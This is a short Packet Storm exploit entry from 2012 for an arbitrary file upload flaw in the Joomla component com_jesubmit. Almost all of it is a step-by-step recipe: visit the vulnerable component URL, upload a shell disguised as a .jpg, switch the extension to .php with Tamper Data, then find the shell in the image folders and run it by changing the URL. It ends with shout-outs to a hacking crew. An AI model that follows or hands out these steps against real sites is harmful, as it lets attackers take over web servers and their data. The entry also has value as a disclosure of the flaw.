Joomla Jesubmit Shell Upload

2012-01-24T00:00:00
ID PACKETSTORM:109051
Type packetstorm
Reporter Robert Cooper
Modified 2012-01-24T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla Component (com_jesubmit) Arbitrary File Upload  
# Date: 1/24/2012  
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )  
# Tested on: [Linux/Windows 7]  
  
  
##############################################################  
Exploit:  
  
#Visit the website  
  
#Navigate to index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en  
or  
#index.php/component/option,com_jesubmit/Itemid,[id]/view,jesubmit/  
  
#Upload your shell with the extention .jpg  
  
#Use Tamper Data to change the extention to .php  
  
#Locate your shell by inspecting the source, (Usually /images or /user_images) it will still have the .jpg extention in the path, just change the extention in the URL.  
  
##############################################################  
  
www.areyousecure.net  
  
www.websiteauditing.org  
  
  
# Shouts to the Belegit crew  
`